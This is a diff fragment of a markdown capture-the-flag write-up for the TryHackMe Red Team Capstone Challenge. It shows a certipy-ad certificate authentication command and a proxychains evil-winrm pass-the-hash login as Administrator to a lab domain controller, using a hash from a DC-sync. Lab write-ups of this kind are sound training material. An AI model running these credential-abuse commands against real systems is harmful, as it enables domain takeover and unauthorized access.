7RU7H/CTFs/TryHackMe/Red-Team-Capstone-Challenge/Red-Team-Capstone-Challenge-Helped-Through.md

 certipy-ad auth -dc-ip 10.200.116.102 -ns 10.200.116.102 -pfx unprotected.pfx
 ```

+#### Viewing the other ways...

-[Tyler](https://www.youtube.com/watch?v=xzxpn6k7OIQ) demonstrates we could also use `evil-winrm` and the hash from the dc-sync to remote into the dc through pass-the-hash
+[Tyler](https://www.youtube.com/watch?v=xzxpn6k7OIQ) demonstrates we could also use `evil-winrm` and the hash from the dc-sync to remote into the dc through pass-the-hash.
 ```bash
 proxychains evil-winrm -i 10.200.116.102 -u Administrator -H 'd3d4edcc015856e386074795aea86b3e'
 ```

-#### Catching up on Email
+Catching up on Email some more messages from Am03baM4n

-Messages from Am03baM4n
 ![](messagefromAmoebaman3.png)

 Server Alert..